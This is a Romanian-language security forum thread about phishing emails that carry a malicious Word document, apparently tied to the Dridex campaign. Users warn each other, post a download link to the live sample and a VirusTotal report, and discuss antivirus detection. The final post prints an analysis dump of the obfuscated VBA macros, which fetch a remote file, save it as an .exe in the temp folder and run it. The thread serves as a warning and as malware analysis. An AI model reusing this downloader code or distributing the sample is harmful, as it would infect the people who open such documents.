TAJ Posted August 13, 2015 Report Share Posted August 13, 2015 (edited) De cateva zile tot primesc niste emailuri false. In prima faza am crezut ca e un document de la contabila mea, dar defapt s-a dovedit a fi o mare teapa.Am primit un email cu un document virusat. Cand l-am descarcat l-a sters antivirusul. La o analiza mai detaliata am vazut ca este un keylogger. Pe adresa de email am 50 de sub-adrese: plm_Ceva-listafirme@yahoo.com, plm_Ceva-rstforums@yahoo.com etc etcAm primit mail de la listafirme.roDesteptii de la listafirme.ro vand baza lor de date cu: Nume/Prenume, Telefon, Firma inregistrata, Email etc etc.Din punctul meu de vedere, acesti indivizi contribuie la fraude odata ce colecteaza o baza de date, apoi o vand unor hackeri, scammeri, carderi etc.In momentul in care i-am contactat si le-am cerut explicatii, mi-au zis ca imi vor sterge contul ca sa nu mai fiu spamat/sunat pe telefon sa mi se faca fel si fel de oferte de tepe, dar nicidecum sa nu mai vanda datele personale ale unor oameni care isi infiinteaza o firma sau au cont la ei pe site.Mare atentie la aceste documente. Sa nu fiti victima hotilor!!!Download https://www.sendspace.com/file/9vthaphttps://www.virustotal.com/en/file/6d240189783402f2a0662351b69a9fd6b14b798d1d2a3046d61ee5e8a6172733/analysis/1439528103/http://i.imgur.com/J1mtEJv.pngEDIT:PRIMA VICTIMA: O cunostinta de a mea https://rstforums.com/forum/105316-virsus-ce-ma-pune-sa-platesc-2-btc-pentru-recupera-fisierele-ajutor-urgent.rst Edited September 4, 2015 by TAJ Quote Link to comment Share on other sites More sharing options...
Nytro Posted August 13, 2015 Report Share Posted August 13, 2015 Exploit de Word, nu deschide.Uploadeaza-l undeva si da-ne link.E plina campanie Dridex. Quote Link to comment Share on other sites More sharing options...
Guest Posted August 13, 2015 Report Share Posted August 13, 2015 Forward catre cybercrime@politiaromana.ro Quote Link to comment Share on other sites More sharing options...
TAJ Posted August 13, 2015 Author Report Share Posted August 13, 2015 Exploit de Word, nu deschide.Uploadeaza-l undeva si da-ne link.E plina campanie Dridex.O sa-l descarc maine de pe alt PC. Nu ma lasa antivirusul sa-l descarc pe acesta si nici nu as vrea da dau OPEN din greseala.Forward catre cybercrime@politiaromana.roVor vedea ei postarea aici pe forum, nu-ti fa probleme. Quote Link to comment Share on other sites More sharing options...
Guest Posted August 13, 2015 Report Share Posted August 13, 2015 Forward catre cybercrime@politiaromana.roVor vedea ei postarea aici pe forum, nu-ti fa probleme."Perfect ai fost intre cei perfecti si s-a gasit in tine viclesug [...]".De ce sa nu faci un lucru bun daca il poti face si preferi sa lasi problema sa dospeasca ?La acele mail-uri am facut forward catre e-frauda (cybercrime), si voi mai face la orice scam primit. Doar pentru ca pot si pentru ca nu este un lucru rau. Quote Link to comment Share on other sites More sharing options...
TAJ Posted August 13, 2015 Author Report Share Posted August 13, 2015 "Perfect ai fost intre cei perfecti si s-a gasit in tine viclesug [...]".De ce sa nu faci un lucru bun daca il poti face si preferi sa lasi problema sa dospeasca ?La acele mail-uri am facut forward catre e-frauda (cybercrime), si voi mai face la orice scam primit. Doar pentru ca pot si pentru ca nu este un lucru rau.Oricum am raportat, dar vor vedea si aici baietii undercover.Nu am deschis documentul pentru ca stiu despre ce este vorba, dar daca nu ma atentiona antivirusul, erau sanse 50% sa musc momeala. Quote Link to comment Share on other sites More sharing options...
WIK Posted August 13, 2015 Report Share Posted August 13, 2015 Metoda foarte penibila de a face bani, (furt) Acum daca stam sa analizam putin mai profund cazul acesta, posibil chiar ei sa trimita aceste mailuri sau angajati din cadrul "listafirme.ro" ideea este sa te duci personal la IGP sau la DIICOT si sa depui plangere, daca te duci la sectia x politie posibil sa stea mult si bine reclamatia intr-un sertar in nustiu ce birou, sau in nu stiu ce debara a politiei!Foarte urat din partea lor! Quote Link to comment Share on other sites More sharing options...
Ganav Posted August 13, 2015 Report Share Posted August 13, 2015 @TAJDescarca documentul pe un VM si post-eaza un link de descarcare aici. Sunt curios de exploit. Daca l-a vazut antivirusul sigur nu este 0-day. Quote Link to comment Share on other sites More sharing options...
konstantine Posted August 13, 2015 Report Share Posted August 13, 2015 Societatea comerciala lista****.ro am impresia ca e firma "prosperului om de afaceri care n-a avut legaruri cu securitatea",ala cu firma de gunoi,care a fost parlamentar.Hint:wooden leg Quote Link to comment Share on other sites More sharing options...
Sveratus Posted August 13, 2015 Report Share Posted August 13, 2015 Societatea comerciala lista****.ro am impresia ca e firma "prosperului om de afaceri care n-a avut legaruri cu securitatea",ala cu firma de gunoi,care a fost parlamentar.Hint:wooden leg Quote Link to comment Share on other sites More sharing options...
TAJ Posted August 14, 2015 Author Report Share Posted August 14, 2015 @Ganav Download: https://www.sendspace.com/file/9vthapAm reusit sa urc documentul pe sendspace.L-am analizat pe virustotal... https://www.virustotal.com/en/file/6d240189783402f2a0662351b69a9fd6b14b798d1d2a3046d61ee5e8a6172733/analysis/1439528103/ Quote Link to comment Share on other sites More sharing options...
Scorpionadi Posted August 14, 2015 Report Share Posted August 14, 2015 (edited) Cred ca este aproximativ acelasi exploit, la fel am primit si eu tot pe mailul de la firma(mail intern), doar ca la mine se numea: 9C_D36974_219373.doc . L-am scanat pe virustotal si in acel moment doar un singur antivirus l-a recunoscut( Arcabit ) Edited August 14, 2015 by Scorpionadi Quote Link to comment Share on other sites More sharing options...
gigiRoman Posted August 14, 2015 Report Share Posted August 14, 2015 Salut, as avea si eu o intrebare. Care este metoda prin care un antivirus isi da seama ca fisierul este sau nu virus? Eu ma gandeam ca tine intr-o baza de date hash-ul virusilor descoperiti si dupa ce calculeaza hash-ul fisierului uploadat il compara cu cele din baza. Sau merge la nivel inferior si citeste intructiunile din spate?Ma gandesc ca macrourile astea nu sunt detectate tocmai pt ca astia schimba continutul fisierului? Ma poate ajuta careva cu o informatie? Multumesc. Quote Link to comment Share on other sites More sharing options...
Active Members MrGrj Posted August 14, 2015 Active Members Report Share Posted August 14, 2015 Salut, as avea si eu o intrebare. Care este metoda prin care un antivirus isi da seama ca fisierul este sau nu virus? Eu ma gandeam ca tine intr-o baza de date hash-ul virusilor descoperiti si dupa ce calculeaza hash-ul fisierului uploadat il compara cu cele din baza. Sau merge la nivel inferior si citeste intructiunile din spate?Ma gandesc ca macrourile astea nu sunt detectate tocmai pt ca astia schimba continutul fisierului? Ma poate ajuta careva cu o informatie? Multumesc.Exista diferite tipuri de a detecta virusii:- antivirusul se uita la binary markup-ul fisierului pentru a face match in baza de date ce contine virusi si troiani.- verifica ce face programul respectiv + vede daca el face ceva similar virusilor- analizeaza sursa programului si cauta bucati de cod malitioase ( asta este de multe ori foarte dificil si de obicei doar antivirusii foarte avansati folosesc aceasta metoda + este foarte lenta) Quote Link to comment Share on other sites More sharing options...
gigiRoman Posted August 14, 2015 Report Share Posted August 14, 2015 Uite pai si daca ala care trimite doc-ul de fiecare data face un doc nou in care pune text aleator si apoi injecteaza macro vb nu va avea de fiecare data binary markup diferit? Ceea ce face foarte grea misiunea pt antivirus.O colega de serviciu a primit sapt asta un doc atasat cu o factura chipurile. In doc erau niste litere la plezneala cam 500 de caractere. Quote Link to comment Share on other sites More sharing options...
Active Members MrGrj Posted August 14, 2015 Active Members Report Share Posted August 14, 2015 Uite pai si daca ala care trimite doc-ul de fiecare data face un doc nou in care pune text aleator si apoi injecteaza macro vb nu va avea de fiecare data binary markup diferit? Ceea ce face foarte grea misiunea pt antivirus.O colega de serviciu a primit sapt asta un doc atasat cu o factura chipurile. In doc erau niste litere la plezneala cam 500 de caractere.Exista destule software-uri care pot detecta malicious macro. Quote Link to comment Share on other sites More sharing options...
TAJ Posted August 14, 2015 Author Report Share Posted August 14, 2015 Cred ca este aproximati acelasi explit, la fel am primit si eu tot pe mailul de la firma(mail intern), doar ca la mine se numea: 9C_D36974_219373.doc . L-am scanat pe virustotal si in acel moment doar un singur antivirus l-a recunoscut( Arcabit )Am primit aproximativ 15 mailuri cu numele diferit la documente de la 15 firme diferite. Quote Link to comment Share on other sites More sharing options...
gigiRoman Posted August 14, 2015 Report Share Posted August 14, 2015 Pai mai sus scorpionadi spunea ca nu a fost detectat pe virustotal. Asta incercam eu sa inteleg: De ce un vb macro nu e detectat? Probabil virustotal scaneaza doar binary markup-ul? Quote Link to comment Share on other sites More sharing options...
Cheater Posted August 14, 2015 Report Share Posted August 14, 2015 Si eu primesc de cateva zile mailuri de genu, cam 3-4 pe zi cu nume diferite de firme.L-am urcat pe virus total, sa ajunga la av mai repede...Daca vrea cineva un sample si de la mine write here sau private. Quote Link to comment Share on other sites More sharing options...
__self__ Posted August 14, 2015 Report Share Posted August 14, 2015 Cred ca este aproximati acelasi explit, la fel am primit si eu tot pe mailul de la firma(mail intern), doar ca la mine se numea: 9C_D36974_219373.doc . L-am scanat pe virustotal si in acel moment doar un singur antivirus l-a recunoscut( Arcabit )Pui si un link la analiza VT?Campania curenta foloseste cod comun, care este detectat de majoritatea AV. Quote Link to comment Share on other sites More sharing options...
TAJ Posted August 14, 2015 Author Report Share Posted August 14, 2015 Pui si un link la analiza VT?Campania curenta foloseste cod comun, care este detectat de majoritatea AV.Vezi ca am pus eu analiza pe virustotal. Quote Link to comment Share on other sites More sharing options...
Farmacie Posted August 14, 2015 Report Share Posted August 14, 2015 >> http://i.imgur.com/fwfj6Mw.png Quote Link to comment Share on other sites More sharing options...
TAJ Posted August 14, 2015 Author Report Share Posted August 14, 2015 >> http://i.imgur.com/fwfj6Mw.pngExact aceleasi chestii le-am primit si eu Quote Link to comment Share on other sites More sharing options...
Sveratus Posted August 14, 2015 Report Share Posted August 14, 2015 Ma tot gândeam cum dracu se bag? keylogger în .doc.. Quote Link to comment Share on other sites More sharing options...
Gushterul Posted August 14, 2015 Report Share Posted August 14, 2015 ca idee: 20: M 3760 'VBA/Module1' Plugin: VBA summary plugin Attribute VB_Name = "Module1" Sub FUfhVHJF() Open "PCWNTU.LGL" For Binary As 24 IUTGUsdf.Open "GET", Module2.YGKkasdf, False Open "KXAZHV.ZFB" For Binary As 64 Open "AMUTZG.QST" For Binary As 93 Open "YMCLUQ.YJV" For Binary As 13 Open "XVRHOM.DAU" For Binary As 74 Open "ACMTFH.AWW" For Binary As 84 Open "SUGAOT.XBD" For Binary As 37 Open "EQXBQF.XVK" For Binary As 99 Open "UQSDHP.JEP" For Binary As 29 End Sub 21: M 1400 'VBA/Module2' Plugin: VBA summary plugin Attribute VB_Name = "Module2" Public Function YGKkasdf() End Function 22: M 3893 'VBA/Module3' Plugin: VBA summary plugin Attribute VB_Name = "Module3" Public Function YgVBNCB() Open "XJZFQZ.XFE" For Binary As 72 FYFhvj = "T" Open "NHKEHV.PIJ" For Binary As 82 pOPad = FYFhvj + "EM" Open "JMBNKU.JKN" For Binary As 53 YgVBNCB = pOPad + "P" End Function Public Function cXXXdsf() Open "RKWJOM.FPM" For Binary As 12 tFTY = "Mic" Open "OKQTFH.IGS" For Binary As 22 yuITUffvvvv = "ft.XM" Open "BXKEHB.HVW" For Binary As 84 cXXXdsf = tFTY + "roso" + yuITUffvvvv + "LHTTP" End Function Public Function FcbncvC() Open "SXEQXP.TOB" For Binary As 34 ytrRReef = "DOD" Open "JXLBZY.NFJ" For Binary As 53 tyurddvh = "Str" Open "WWOFIZ.FIT" For Binary As 63 FcbncvC = "A" + ytrRReef + "B." + tyurddvh + "eam" End Function 23: M 1135 'VBA/Module4' Plugin: VBA summary plugin Attribute VB_Name = "Module4" Public Function UFGisdf() UFGisdf = Environ(Module3.YgVBNCB) & "/dfsdFFv.exe" End Function Public Function VKHdsfsdf() VKHdsfsdf = Shell("cmd /c start %TMP%/dfsdFFv.exe") End Function 24: M 1383 'VBA/ThisDocument' Plugin: VBA summary plugin Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Sub bvghVGxcx() End Sub Sub AutoOpen() End Sub Sub Workbook_Open() End Sub 25: m 998 'VBA/ThisDocument1' Plugin: VBA summary plugin Attribute VB_Name = "ThisDocument1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" 26: M 1442 'VBA/ThisDocument2' Plugin: VBA summary plugin Attribute VB_Name = "ThisDocument2" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Sub bvghVGxcx() End Sub Sub AutoOpen() End Sub Sub Workbook_Open() End Sub Quote Link to comment Share on other sites More sharing options...
